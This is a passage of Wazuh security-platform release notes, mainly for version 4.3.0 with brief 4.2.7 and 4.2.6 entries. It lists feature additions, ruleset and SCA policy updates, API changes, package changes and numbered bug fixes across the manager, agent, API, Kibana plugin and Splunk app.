  • #12491 The Ubuntu OVAL feed URL is changed to security-metadata.canonical.com.

  • #12652 Now, Analysisd warns about missing rule dependencies instead of rejecting the ruleset.

  • #8399 The data reporting for Rootcheck scans in the agent_control tool has been deprecated.

  • #8846 The old framework functions used to calculate agent status are now removed.

Agent
  • #8016 An option is added to allow the agent to refresh the connection to the manager.

  • #8532 A new module to collect audit logs from GitHub is introduced.

  • #8461 FIM now expands wildcarded paths in the configuration on Windows agents.

  • #8754 FIM reloads wildcarded paths on full scans.

  • #8306 Wazuh adds a new path_suffix option to the AWS module configuration.

  • #8331 A new discard_regex option is added to the AWS module configuration.

  • #8482 Wazuh adds support for the S3 Server Access bucket type in the AWS module.

  • #9119 Wazuh adds support for Google Cloud Storage buckets using a new GCP module called gcp-bucket.

  • #9119 Wazuh adds support for Google Cloud Storage access logs to the gcp-bucket module.

  • #9420 Wazuh adds support for VPC endpoints in the AWS module.

  • #9279 Wazuh adds support for GCS access logs in the GCP module.

  • #10198 An IAM role session duration parameter is added to the AWS module.

  • #8826 Wazuh adds support for variables in SCA policies.

  • #7721 FIM now fills an audit rule file to support who-data even when Audit is in immutable mode.

  • #8957 An integration to collect audit logs from Office 365 is introduced.

  • #10168 A new DisplayVersion field is added to Syscollector to help Vulnerability Detector match vulnerabilities for Windows.

  • #10148 Wazuh adds support for macOS agent upgrade via WPK.

  • #8632 Wazuh adds Logcollector support for macOS logs (Unified Logging System).

  • #8381 The agent now reports the version of the running AIX operating system to the manager.

  • #8604 The reliability of the user ID parsing in FIM who-data mode on Linux is improved.

  • #10230 The AWS service_endpoint parameter description is reworded to also suit FIPS endpoints.

  • #5047 The support of Logcollector for MySQL 4.7 logs is extended.

  • #9887 Agents running on FreeBSD and OpenBSD now report their IP addresses.

  • #8202 The verbosity of FIM debugging logs is reduced.

  • #9992 The agent's IP resolution frequency has been limited to prevent high CPU load.

  • #10236 Syscollector is optimized to use less memory.

  • #10337 Wazuh adds support for ZscalerOS system information in the agent.

  • #10259 Syscollector is extended to collect missing Microsoft product hotfixes.

  • #10396 The osquery integration is updated to find the new osqueryd location as of version 5.0.

  • #9123 The internal FIM data handling has been simplified to find files by their path instead of their inode.

  • #9764 The WPK installer rollback on Windows is reimplemented.

  • #10208 Active responses for Windows agents now support native fields from Eventchannel.

  • #10651 Error logs by Logcollector when a file is missing have been changed to info logs.

  • #8724 The agent MSI installer for Windows now detects the platform version to install the default configuration.

  • #3659 Agent logs for inability to resolve the manager hostname now have info level.

  • #11276 An ID number is added to connection enrollment logs.

  • #10838 Standardized the use of the only_logs_after parameter in the external integration modules.

  • #10900 The oscap module files are removed as it was already deprecated in version 4.0.0.

  • #12150 DockerListener integration shebang is updated to python3 for Wazuh agents.

  • #12779 The ico and jpg files have been updated with the new Wazuh logo for the Windows installer.

RESTful API
  • #7988 A new PUT /agents/reconnect endpoint is added to force agents reconnection to the manager.

  • #6761 The select parameter is added to the GET /security/users, GET /security/roles, GET /security/rules and GET /security/policies endpoints.

  • #8100 The type and status filters are added to GET /vulnerability/{agent_id} endpoint.

  • #7490 An option is added to configure SSL ciphers.

  • #8919 An option is added to configure the maximum response time of the API.

  • #8945 A new DELETE /rootcheck/{agent_id} endpoint is added.

  • #9028 A new GET /vulnerability/{agent_id}/last_scan endpoint is added to check the latest vulnerability scan of an agent.

  • #9028 New cvss and severity fields and filters are added to the GET /vulnerability/{agent_id} endpoint.

  • #9100 An option is added to configure the maximum allowed API upload size.

  • #9142 New unit and integration tests for API models are added.

  • #9077 A message with the PID of wazuh-apid process when launched in foreground mode is added.

  • #9144 Wazuh adds external id, source, and url to the MITRE endpoints responses.

  • #9297 Custom healthchecks for legacy agents are added in API integration tests, improving maintainability.

  • #9914 A new unit test for the API python module is added to increase coverage.

  • #10238 Separate Docker logs are added in the API integration tests environment to get cleaner reports.

  • #10437 A new disconnection_time field is added to GET /agents response.

  • #10457 New filters are added to agents' upgrade endpoints.

  • #8288 New MITRE API endpoints and framework functions are added to access all the MITRE information.

  • #10947 An agent-info permissions flag is now shown when using cluster_control and in the GET /cluster/healthcheck API endpoint.

  • #11931 Agents' ossec.log is now saved if an API integration test fails.

  • #12085 The POST /security/user/authenticate/run_as endpoint is added to the API bruteforce blocking system.

  • #12638 A new API endpoint is added to obtain summaries of agent vulnerabilities' inventory items.

  • #12727 The new fields external_references, condition, title, published, and updated are added to GET /vulnerability/{agent_id} API endpoint.

  • #13262 The possibility to include strings in brackets in values of the q parameter is added.

  • #7490 The SSL protocol configuration parameter is renamed.

  • #8827 The API spec examples and JSON body examples are reviewed and updated.

  • The performance of several API endpoints is improved. This is especially appreciable in environments with a big number of agents:
    • #8937 The PUT /agents/group endpoint is improved.

    • #8938 The PUT /agents/restart endpoint is improved.

    • #8950 The DELETE /agents endpoint is improved.

    • #8959 The PUT /rootcheck endpoint is improved.

    • #8966 The PUT /syscheck endpoint is improved.

    • #9046 The DELETE /groups endpoint is improved and the API response is changed to be more consistent.

  • #8945 The DELETE /rootcheck endpoint is changed to DELETE /experimental/rootcheck.

  • #9012 The time it takes for the wazuh-apid process to check its configuration when using the -t parameter is reduced.

  • #9019 The malfunction in the sort parameter of syscollector endpoints is fixed.

  • #9113 The API integration tests stability when failing in entrypoint is improved.

  • #9228 The SCA API integration tests are made dynamic to validate responses coming from any agent version.

  • #9227 All the date fields in the API responses are refactored and standardized to use ISO 8601.

  • #9263 The Server header from API HTTP responses is removed.

  • #9371 The JWT implementation is improved by replacing the HS256 signing algorithm with RS256.

  • #10009 The limit of agents to upgrade using the API upgrade endpoints is removed.

  • #10158 The Windows agent's FIM responses are changed to return permissions as JSON.

  • #10389 The API endpoints are adapted to changes in wazuh-authd daemon force parameter.

  • #10512 The use_only_authd API configuration option and related functionality are deprecated. wazuh-authd will always be required for creating and removing agents.

  • #10745 The API validators and related unit tests are improved.

  • #10905 The specific module healthchecks in the API integration tests environment are improved.

  • #10916 Thread pool executors are changed to process pool executors to improve API availability.

  • #11410 The HTTPS options to use files instead of relative paths are changed.

  • #8599 The select parameter from GET /agents/stats/distinct endpoint is removed.

  • #8099 The GET /mitre endpoint is removed.

  • #11410 The option to set the log path in the configuration is deprecated.

Ruleset
  • #11306 Carbanak detection rules are added.

  • #11309 Cisco FTD rules and decoders are added.

  • #11284 Decoders for AWS EKS service are added.

  • #11394 F5 BIG IP ruleset is added.

  • #11191 GCP VPC storage, firewall, and flow rules are added.

  • #11323 GitLab 12.0 ruleset is added.

  • #11289 Microsoft Exchange Server rules and decoders are added.

  • #11390 Microsoft Windows persistence by using registry keys detection is added.

  • #11274 Oracle Database 12c rules and decoders are added.

  • #8476 Rules for Carbanak step 1.A - User Execution: Malicious files are added.

  • #11212 Rules for Carbanak step 2.A - Local discoveries are added.

  • #9075 Rules for Carbanak step 2.B - Screen capture are added.

  • #9097 Rules for Carbanak step 5.B - Lateral movement via SSH are added.

  • #11342 Rules for Carbanak step 9.A - User monitoring are added.

  • #11373 Rules for Cloudflare WAF are added.

  • #11013 Ruleset for ESET Remote console is added.

  • #8532 Ruleset for GitHub audit logs is added.

  • #11137 Ruleset for Palo Alto v8.X - v10.X is added.

  • #11431 SCA policy for Amazon Linux 1 is added.

  • #11480 SCA policy for Amazon Linux 2 is added.

  • #7035 SCA policy for apple macOS 10.14 Mojave is added.

  • #7036 SCA policy for apple macOS 10.15 Catalina is added.

  • #11454 SCA policy for macOS Big Sur is added.

  • #11250 SCA policy for Microsoft IIS 10 is added.

  • #11249 SCA policy for Microsoft SQL 2016 is added.

  • #11247 SCA policy for Mongo Database 3.6 is added.

  • #11248 SCA policy for NGINX is added.

  • #11245 SCA policy for Oracle Database 19c is added.

  • #11154 SCA policy for PostgreSQL 13 is added.

  • #11223 SCA policy for SUSE Linux Enterprise Server 15 is added.

  • #11432 SCA policy for Ubuntu 14 is added.

  • #11452 SCA policy for Ubuntu 16 is added.

  • #11453 SCA policy for Ubuntu 18 is added.

  • #11430 SCA policy for Ubuntu 20 is added.

  • #11286 SCA policy for Solaris 11.4 is added.

  • #11122 Sophos UTM Firewall ruleset is added.

  • #11357 Wazuh-api ruleset is added.

  • #11016 Audit rules are updated.

  • #11177 AWS s3 ruleset is updated.

  • #11344 The Exim 4 decoder and rules are updated to the latest format.

  • #8738 The MITRE DB is updated with the latest MITRE JSON specification.

  • #11255 Multiple rules are updated to remove the alert_by_email option.

  • #11795 NextCloud ruleset is updated.

  • #11232 ProFTPD decoder is updated.

  • #11242 RedHat Enterprise Linux 8 SCA up to version 1.0.1 is updated.

  • #11100 Rules and decoders for FortiNet products are updated.

  • #11429 SCA policy for CentOS 7 is updated.

  • #8751 SCA policy for CentOS 8 is updated.

  • #11263 SonicWall decoder values are fixed.

  • #11388 SSHD ruleset is updated.

  • #8552 From file 0580-win-security_rules.xml, rules with id 60198 and 60199 are moved to file 0585-win-application_rules.xml, with rule ids 61071 and 61072 respectively.

Wazuh Kibana plugin
  • #3557 GitHub and Office365 modules are added.

  • #3541 A new Panel module tab for GitHub and Office365 modules is added.

  • #3639 Wazuh adds the ability to filter the results for the Network Ports table in the Inventory data section.

  • #3324 A new endpoint service is added to collect the frontend logs into a file.

  • #3327 #3321 #3367 #3373 #3374 #3390 #3410 #3408 #3429 #3427 #3417 #3462 #3451 #3442 #3480 #3472 #3434 #3392 #3404 #3432 #3415 #3469 #3448 #3465 #3464 #3478 The frontend error handling strategy is improved: UI, toasts, console log, and log file.

  • #3368 #3344 #3726 Intelligence tab is added to the MITRE ATT&CK module.

  • #3424 Sample data for office365 events are added.

  • #3475 A separate component to check for sample data is created.

  • #3506 A new hook for getting value suggestions is added.

  • #3531 Dynamic simple filters and simple GitHub filters fields are added.

  • #3524 Configuration viewer for Module Office 365 is added to the Configuration section of the Management menu.

  • #3518 A side panel component that displays information about the active module of the Office 365 setup is introduced.

  • #3533 Specifics and custom filters for Office 365 search bar are added.

  • #3544 Pagination and filtering are added to the drilldown tables in the Office panel.

  • #3568 Simple filters change between panel and drilldown panel.

  • #3525 New fields are added to the Inventory table and Flyout Details.

  • #3691 A columns selector is added to the agents table.

  • #3742 A new workflow is added for creating wazuh packages.

  • #3783 Template and fields checks in the health check now run correctly according to the app configuration.

  • #3804 A toast message lets you know when there is an error creating a new group.

  • #3846 A step to start the agent is added to the deploy new Windows agent guide.

  • #3893 3 new panels are added to Vulnerabilities/Inventory.

  • #3893 A new field of Vulnerabilities is added to the details flyout.

  • #3924 Missing fields used in visualizations are added to the known fields related to alerts.

  • #3946 A troubleshooting link is added to the "index pattern was refreshed" toast.

  • #4041 More number options are added to the tables widget in Modules -> "Mitre".

  • #3121 Ossec to wazuh is changed in all sample-data files.

  • #3279 Empty fields are modified in FIM tables and syscheck.value_name in discovery now shows an empty tag for visual clarity.

  • #3346 The MITRE tactics and techniques resources are adapted to use the API endpoints.

  • #3517 The filterManager subscription is moved to the hook useFilterManager.

  • #3529 Filter is changed from "is" to "is one of" in the custom search bar.

  • #3494 Refactor modules-defaults.js to define what buttons and components are rendered in each module tab.

  • #3663 #3806 The deprecated and new references for the authd configuration are updated.

  • #3549 Time subscription is added to the Discover component.

  • #3446 Testing logs using the Ruleset Test no longer displays the rule information if no rule matches.

  • #3649 The format permissions are changed in the FIM inventory.

  • #3686 #3728 The request to agents that do not return data is now changed to avoid unnecessary heavy load requests.

  • #3788 Rebranding. The brand logos are replaced and module icons are set with brand colors.

  • #3795 User used for sample data management is changed.

  • #3792 The agent install code block copy button and the PowerShell terminal warning are changed.

  • #3811 The naming related to the plugin platform is replaced, changing from a specific name to a generic one using the term plugin platform.

  • #3893 Dashboard tab of Vulnerabilities module is removed, three new panels to Vulnerabilities/Inventory are added, and details Flyout fields are enhanced.

  • #3908 Now, all available fields are shown in the Discover Details Flyout table. Furthermore, the open row icon width is fixed in the first column when the table has a few columns.

  • #3924 Missing fields used in visualizations are added to the known fields related to alerts.

  • #3946 Troubleshooting link to "index pattern was refreshed" toast is added.

  • #3196 The table in Vulnerabilities/Inventory is refactored.

  • #3949 Google Groups app icons are changed.

  • #3857 Sorting by the Agents or Configuration checksum column in the table of Management/Groups is removed because it is not supported by the API.

Wazuh Splunk app
  • Support for Wazuh 4.3.0

  • #1166 Alias field is added to API to facilitate distinguishing between different managers.

  • #1126 Ensure backwards compatibility.

  • #1148 A Security Section is added to manage security related configurations.

  • #1171 Crud Policies are added to the security section.

  • #1168 Crud Roles are added to the security section.

  • #1169 Crud Role Mapping is added to the security section.

  • #1173 Crud Users is added to the security section.

  • #1147 Created a permissions validation service.

  • #1164 Implemented the access control on the App's views.

  • #1155 Implemented a service to fetch Wazuh's users and their roles.

  • #1156 Implemented a service to fetch Splunk's users and their roles.

  • #1149 A run_as checkbox is added to the API configuration.

  • #1174 The ability to use the Authorization Context login method is added.

  • #1228 Extensions now can only be changed by Splunk Admins.

  • #1186 Wazuh rebranding.

  • #1172 Deprecated authd options are updated.

  • #1236 Refactored branding color styles to improve maintainability.

  • #1243 Wazuh API's name is changed to its alias in the quick settings selector.

Other
  • #10247 External SQLite library dependency is upgraded to version 3.36.

  • #10247 External BerkeleyDB library dependency is upgraded to version 18.1.40.

  • #10247 External OpenSSL library dependency is upgraded to version 1.1.1l.

  • #10927 External Google Test library dependency is upgraded to version 1.11.

  • #11436 External Aiohttp library dependency is upgraded to version 3.8.1.

  • #11436 External Werkzeug library dependency is upgraded to version 2.0.2.

  • #11436 Embedded Python is upgraded to version 3.9.9.

Packages
  • #1518 Changed default attributes in the Wazuh dashboard package. (A new wazuh-dashboard package with the -2 revision was released.)

  • #1496 Hide passwords in log file.

  • #1500 The dashboard IP messages are fixed.

  • #1499 Improved APT locked message and retry time.

  • #1497 Unhandled promise for the dashboard is fixed.

  • #1494 Update ova motd message 4.3.

  • #1471 Remove service disable from RPM and Debian packages.

  • #1471 Disabled multitenancy by default in the dashboard and changed the app default route.

  • #1434 Set as a warning the unhandled promises in the Wazuh dashboard.

  • #1395 Remove IP message from OVA.

  • #1390 Remove demo certificates from indexer and dashboard packages.

  • #1307 Add centos8 vault repository due to EOL.

  • #1302 The user deletion warning RPM manager is fixed.

  • #1292 The issue where Solaris 11 was not executed in clean installations is fixed.

  • #1280 The error where Wazuh could continue running after uninstalling is fixed.

  • #1274 The AIX partition size is fixed.

  • #1147 The Solaris 11 upgrade from previous packages is fixed.

  • #1126 Add new GCloud integration files to Solaris 11.

  • #689 Update SPECS.

  • #888 An error in CentOS 5 building is fixed.

  • #944 Add new SCA files to Solaris 11.

  • #915 Improved support for ppc64le on CentOS and Debian.

  • #1005 The error with wazuh user in Debian packages is fixed.

  • #1023 Add ossec user and group during compilation.

  • #1261 Merge Wazuh Dashboard v3 #.

  • #1256 The certs permissions in RPM is fixed.

  • #1208 Kibana app now supports pluginPlatform.version property in the app manifest.

  • #1162 The certificates creation using parameters 4.3 is fixed.

  • #1193 The Archlinux package generation parameters 4.3 are fixed.

  • #1132 Add new 2.17.1 log4j mitigation version 4.3.

  • #1123 The client keys Ownership for 3.7.x and previous versions is fixed.

  • #1106 A new log4j remediation 4.3 is added.

  • #1112 The Linux wpk generation 4.3 is fixed.

  • #1096 Add log4j mitigation 4.3.

  • #1086 Increase admin.pem cert expiration date 4.3.

  • #1078 Remove wazuh user from unattended/OVA/AMI 4.3.

  • #1074 The groupdel ossec error during upgrade to 4.3.0 is fixed.

  • #1067 The curl kibana.yml 4.3 is fixed.

  • #1060 Remove restore-permissions.sh from Debian Packages.

  • #1048 Bump unattended 4.3.0.

  • #1012 Removed cd usages in unattended installer and fixed uninstaller 4.3.

  • #1020 Removed warning and added text in wazuh-passwords-tool.sh final message 4.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#8223

A memory defect is fixed in Remoted when closing connection handles.

#7625

A timing problem is fixed in the manager that might prevent Analysisd from sending Active responses to agents.

#8210

A bug in Analysisd that did not apply field lookup in rules that overwrite other ones is fixed.

#8902

The manager is now prevented from leaving dangling agent database files.

#8254

The remediation message for error code 6004 is updated.

#8157

A bug when deleting non-existing users or roles in the security SDK is now fixed.

#8418

A bug with agent.conf file permissions when creating an agent group is now fixed.

#8422

Wrong exceptions with wdb pagination mechanism are fixed.

#8747

An error when loading some rules with the \ character is fixed.

#9216

The WazuhDBQuery class is changed to properly close socket connections and prevent file descriptor leaks.

#10320

An error in the API configuration when using the agent_upgrade script is fixed.

#10341

The JSONDecodeError in Distributed API class methods is handled.

#9738

An issue with duplicated logs in Azure-logs module is fixed and several improvements are applied to it.

#10680

The query parameter validation is fixed to allow usage of special chars in Azure module.

#8394

A bug running wazuh-clusterd process when it was already running is fixed.

#8732

Cluster is now allowed to send and receive messages with a size higher than request_chunk.

#9077

A bug that caused wazuh-clusterd process to not delete its PID files when running in foreground mode and it is stopped is fixed.

#10376

Race condition due to lack of atomicity in the cluster synchronization mechanism is fixed.

#10492

A bug when displaying the dates of the cluster tasks that have not finished yet is fixed. Now, n/a is displayed in these cases.

#9196

Missing field value_type in FIM alerts is fixed.

#9292

A typo in the SSH Integrity Check script for Agentless is fixed.

#10421

Multiple race conditions in Remoted are fixed.

#10390

The manager agent database is fixed to prevent dangling entries from removed agents.

#9765

The alerts generated by FIM when a lookup operation on a SID fails are fixed.

#10866

A bug that caused cluster agent-groups files to be synchronized multiple times unnecessarily is fixed.

#10922

An issue in Wazuh DB that compiled the SQL statements multiple times unnecessarily is fixed.

#10948

A crash in Analysisd when setting Active Response with agent_id = 0 is fixed.

#11161

An uninitialized Blowfish encryption structure warning is fixed.

#11262

A memory overrun hazard in Vulnerability Detector is fixed.

#11282

A bug when using a limit parameter higher than the total number of objects in the wazuh-db queries is fixed.

#11440

A false positive for MySQL in Vulnerability Detector is prevented.

#11448

The segmentation fault when the wrong configuration is set is fixed.

#11440

A false positive in Vulnerability Detector is fixed when scanning OVAL for Ubuntu Xenial and Bionic.

#11835

An argument injection hazard is fixed in the Pagerduty integration script. Thank you Jose Maria Zaragoza (@JoseMariaZ) for reporting this issue.

#11863

Memory leaks in the feed parser at Vulnerability Detector are fixed: the architecture data member from the RHEL 5 feed, RHSA items containing no CVEs, and an unused RHSA data member when parsing Debian feeds.

#12368

Now, Authd ignores the pipe signal if Wazuh DB gets closed.

#12415

A buffer handling bug is fixed in Remoted that left the syslog TCP server stuck.

#12644

A memory leak in Vulnerability Detector is fixed when discarding kernel packages.

#12655

A memory leak at wazuh-logtest-legacy is fixed when matching a level-0 rule.

#12489

Now, the cluster is disabled by default when the "disabled" tag is not included.

#13067

A bug in the Vulnerability Detector CPE helper that may lead to producing false positives about Firefox ESR is fixed.

Agent

Reference

Description

#8784

A bug in FIM that did not allow monitoring new directories in real-time mode if the limit was reached at some point is fixed.

#8941

A bug in FIM that threw an error when a query to the internal database returned no data is fixed.

#8362

An error where the IP address was being returned along with the port for Amazon NLB service is fixed.

#8372

AWS module is fixed to properly handle the exception raised when processing a folder without logs.

#8433

A bug with the AWS module when pagination is needed in the bucket is fixed.

#8672

An error with the ipGeoLocation field in AWS Macie logs is fixed.

#10333

An incorrect debug message in the GCloud integration module is changed.

#7848

Data race conditions are fixed in FIM.

#10011

A wrong command line display in the Syscollector process report on Windows is fixed.

#10249

An issue that causes shutdown when agentd or analysisd is stopped is fixed.

#10405

Wrong keepalive message from the agent when file merged.mg is missing is fixed.

#10381

Missing logs from the Windows agent when it's getting stopped are fixed.

#10524

Missing packages reporting in Syscollector for macOS due to empty architecture data is fixed.

#7506

FIM on Linux is fixed to parse audit rules with multiple keys for who-data.

#10639

Windows 11 version collection in the agent is fixed.

#10602

Missing Eventchannel location in Logcollector configuration reporting is fixed.

#10794

CloudWatch Logs integration is updated to avoid crashing when AWS raises Throttling errors.

#10718

AWS modules' log file filtering is fixed when there are logs with and without a prefix mixed in a bucket.

#10884

A bug in the installation script that made upgrades not update the code of the external integration modules is fixed.

#10921

An issue with the AWS integration module trying to parse manually created folders as if they were files is fixed.

#11086

Some installation errors in OS with no subversion are fixed.

#11115

A typo in an error log about enrollment SSL certificate is fixed.

#11121

Unit tests for the Windows agent when built on MinGW 10 are fixed.

#10942

Windows agent compilation warnings are fixed.

#11207

The OS version reported by the agent on OpenSUSE Tumbleweed is fixed.

#11329

The Syscollector is prevented from truncating the open port inode numbers on Linux.

#11365

An agent auto-restart on configuration changes, when started via wazuh-control on a Systemd based Linux OS is fixed.

#10952

A bug in the AWS module resulting in unnecessary API calls when trying to obtain the different Account IDs for the bucket is fixed.

#11278

Azure integration's configuration parsing to allow omitting optional parameters is fixed.

#11296

Azure Storage credentials validation bug is fixed.

#11455

The read of the hostname in the installation process for openSUSE is fixed.

#11425

The graceful shutdown when the agent loses connection is fixed.

#11736

The error "Unable to set server IP address" is fixed on the Windows agent.

#11608

The reparse option is fixed in the AWS VPCFlow and Config integrations.

#12324

The way the AWS Config integration parses the dates used to search in the database for previous records was fixed.

#12676

Now, Logcollector audit format parses logs with a custom name_format.

#12704

An issue with the agent bootstrap that might lead to a startup timeout when it cannot resolve a manager hostname is fixed.

#13088

A bug in the agent's leaky bucket throughput regulator that could leave it stuck if the time is advanced on Windows is fixed.

RESTful API

Reference

Description

#8196

An inconsistency in RBAC resources for group:create, decoders:update, and rules:update actions is fixed.

#8378

The handling of an API error message occurring when Wazuh is started with a wrong ossec.conf is fixed. Now, the execution continues and raises a warning.

#8548

A bug with the sort parameter that caused a wrong response when sorting by several fields is fixed.

#8597

The description of force_time parameter in the API spec reference is fixed.

#8537

An incorrect API path in the remediation message when the maximum number of requests per minute is reached is fixed.

#9071

Agents' healthcheck error in the API integration test environment is fixed.

#9077

A bug with wazuh-apid process handling of PID files when running in foreground mode is fixed.

#9192

A bug with RBAC group_id matching is fixed.

#9147

Temporal development keys and values from GET /cluster/healthcheck response are removed.

#9227

Several errors when filtering by dates are fixed.

#9262

The limit in some endpoints like PUT /agents/group/{group_id}/restart is fixed, and a pagination method is added.

#9320

A bug with the search parameter resulting in invalid results is fixed.

#9368

Wrong values of external_id field in MITRE resources are fixed.

#9399

The way the API integration testing environment checks that the wazuh-apid daemon is running before starting the tests is fixed.

#9777

A healthcheck is added to verify that logcollector stats are ready before starting the API integration test.

#10159

The API integration test healthcheck used in the vulnerability test cases is fixed.

#10179

An error with PUT /agents/node/{node_id}/restart endpoint when no agents are present in selected node is fixed.

#10322

An RBAC experimental API integration test expecting a 1760 code in implicit requests is fixed.

#10289

A cluster race condition that caused the API integration test to randomly fail is fixed.

#10619

The PUT /agents/node/{node_id}/restart endpoint to exclude exception codes properly is fixed.

#10666

The PUT /agents/group/{group_id}/restart endpoint to exclude exception codes properly is fixed.

#10656

The agent endpoints q parameter to allow more operators when filtering by groups is fixed.

#10830

The API integration tests related to rule, decoder, and task endpoints are fixed.

#11411

Exceptions handling when starting the Wazuh API service is improved.

#11598

The race condition while creating RBAC database is fixed.

#12102

The API integration tests failures caused by race conditions are fixed.

Ruleset

Reference

Description

#11117

Bad characters are fixed on rules 60908 and 60884 - win-application rules.

#11369

Microsoft logs rules are fixed.

#11405

PHP rules for MITRE and groups are fixed.

#11214

Rule IDs for Microsoft Windows PowerShell are fixed.

Wazuh Kibana plugin

Reference

Description

#3384

The creation of log files is fixed.

#3484

The double fetching alerts count when pinning/unpinning the agent in MITRE ATT&CK/Framework is fixed.

#3490

The query config is refactored, changing it from Angular to React.

#3412

The flyout closing when dragging and releasing mouse event outside the Rule-test and Decoder-test flyout is fixed.

#3430

Now Wazuh notifies you when you are registering an agent without permission.

#3438

The unused redirectRule query param when clicking a table row on CDB Lists/Decoders is removed.

#3439

An issue where the code overflows over the line numbers in the API Console editor is fixed.

#3440

The issue that prevented opening the main menu when changing the selected API or index pattern is fixed.

#3443

An error message in conf management is fixed.

#3445

An issue related to the size of the API selector when the name is too long is fixed.

#3456

An error when editing a rule or decoder is fixed.

#3458

An issue where the index pattern selector doesn't display the ignored index patterns is fixed.

#3553

An error in /Management/Configuration when the cluster is disabled is fixed.

#3565

An issue where pinned filters were removed when accessing the Panel tab of a module is fixed.

#3645

Multi-select component searcher handler is fixed.

#3609

The ordering of logs in Management/Logs is fixed.

#3661

The Wazuh API requests to GET // are fixed.

#3675

Missing MITRE tactics are fixed.

#3488

The CDB list views not working with IPv6 is fixed.

#3466

The bad requests using the Console tool to PUT /active-response API endpoint are fixed.

#3605

An issue where the group agent management table does not update on error is fixed.

#3651

An issue where package details were not shown in the agent inventory for a FreeBSD agent OS is fixed.

#3652

An issue where the Wazuh token was deleted twice is fixed.

#3687

The handler of an error on dev-tools is fixed.

#3685

The compatibility with wazuh 4.3 - kibana 7.13.4 is fixed.

#3689

The registry values without agent pinned in FIM>Events are fixed.

#3688

The breadcrumbs style compatibility for Kibana 7.14.2 is fixed.

#3682

An issue with the security alerts table when filters change is fixed.

#3692

An error that reported X-Pack as the license when Basic is in use is fixed.

#3700

The blank screen in Kibana 7.10.2 is fixed.

#3704

Errors in the related decoders file link when users click on it are fixed.

#3708

Flyouts in Kibana 7.14.2 are fixed.

#3707

The bug with index patterns in the health check caused by a bad copy of a PR is fixed.

#3733

Styles and behavior of button filter in the flyout of Inventory section for Integrity monitoring and Vulnerabilities modules are fixed.

#3733

The height of the Evolution card in the Agents section when there is no data for the selected time range is fixed.

#3722

Clearing the query filter now updates the data in the Office 365 and GitHub Panel tabs.

#3710

Wrong daemons in the filter list are fixed.

#3724

A bug that threw a misleading error when creating a filename with spaces is fixed.

#3731

A bug in the security User flyout that warned about nonexistent unsubmitted changes is fixed.

#3732

The redirect to a new tab when clicking on a link is fixed.

#3737

Missing settings in Management/Configuration/Global configuration/Global/Main settings are fixed.

#3738

The Maximum call stack size exceeded error when exporting key-value pairs of a CDB list is fixed.

#3741

The regex lookahead and lookbehind for Safari are fixed.

#3744

Vulnerabilities Inventory flyout details filters are fixed.

#3604

Removed API selector toggle from Settings menu since it performed no useful function.

#3748

Dashboard PDF report error when switching pinned agent state is fixed.

#3753

The rendering of the command to deploy a new Windows agent not working in some Kibana versions now works correctly.

#3772

Action buttons no longer overlay with the request text in Tools/API Console.

#3774

A bug in Rule ID value in reporting tables related to top results is now fixed.

#3787

An issue with github/office365 multi-select filters suggested values is now fixed.

#3790

An issue related to updating the aggregation data of the Panel section when changing the time filter is fixed.

#3804

The button to remove an agent from a group is removed from the agents table when the group is the default group.

#3776

Adding a single agent to a group is fixed.

#3777

The implicit filters from the search bar can now be removed.

#3778

The side panel tabs of the Office 365/GitHub modules are fixed.

#3780

Text not wrapping in the MITRE ATT&CK intelligence table is fixed.

#3781

The visualization tooltip position is fixed.

#3787

Suggested values of the GitHub/Office 365 multi-select filters are fixed.

#3796

The styles on the evolution card are fixed.

#3831

The internal user no longer needs permission to make the X-Pack detection request.

#3845

Agents details card style is fixed.

#3854

The agents evolution card is fixed.

#3866

Routing redirection in the Discover links of event documents is fixed.

#3868

Health-check is fixed.

#3901

The table in Vulnerabilities/Inventory not reloading when changing the selected agent is fixed.

#3901

The issue with the table in Modules/Vulnerabilities/Inventory not refreshing when changing the selected agent is fixed.

#3937

An asynchrony issue when multiple fields are missing in the Events view row details is resolved.

#3942

A rendering problem in the map visualizations is fixed.

#3877

A parse error when using the # character anywhere other than at the beginning of a line is fixed.

#3944

The rule.mitre.id cell enhancement not supporting values with sub-techniques is resolved.

#3947

An error when changing the selected time in some flyouts is fixed.

#3957

An issue related to logging out when the Kibana server has a basePath configured is resolved.

#3991

A fatal cron-job error when Wazuh API is down is fixed.

Wazuh Splunk app

Reference

Description

#1137

Long agent names no longer overflow in the overview page.

#1138

An issue that occurred when saving rules or decoders files is now fixed.

#1141

An issue with unnecessary table requests when resizing the browser window is fixed.

#1215

Agent counters are now centered correctly.

#1216

Users can no longer add new agents without the right "create" permissions.

#1217

The navigation bar for Security options no longer overlaps with the background header.

#1223

An error when the agents view is re-initialized is now fixed.

#1230

This issue is fixed and you can now see actions after adding the first API.

#1232

The Agent status chart data is shown correctly.

#1237

The Agent status graph is fixed to show the correct amount of agents.

#1258

The sorting on the Groups table columns is fixed.

#1260

Non-sortable columns are fixed on the Security section tables.

#1271

An error in the group report caused by a disabled configuration parameter is fixed.

#1266

Importing a CDB list file is fixed.

#1282

Header menu height style issue is fixed.

#1283

An error in the search string used by the Alerts Summary table in the Overview > Vulnerability section, which caused the table to show no data, is fixed.

Others

Reference

Description

#9168

Error detection in the CURL helper library is fixed.

#10899

External Berkeley DB library support for GCC 11 is fixed.

#11086

An installation error due to missing OS minor version on CentOS Stream is fixed.

#11455

An installation error due to a missing command hostname on OpenSUSE Tumbleweed is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.7 Release notes - 30 May 2022

This section lists the changes in version 4.2.7. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.7.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.7.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13617

A crash in Vulnerability Detector when scanning agents running on Windows is now fixed (backport from 4.3.2).

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.6 Release notes - 28 March 2022

This section lists the changes in version 4.2.6. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.6.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.6.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#11974

This release resolves an integer overflow hazard in wazuh-remoted that caused it to drop incoming data after receiving 2^31 messages.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.5 Release notes - 15 November 2021

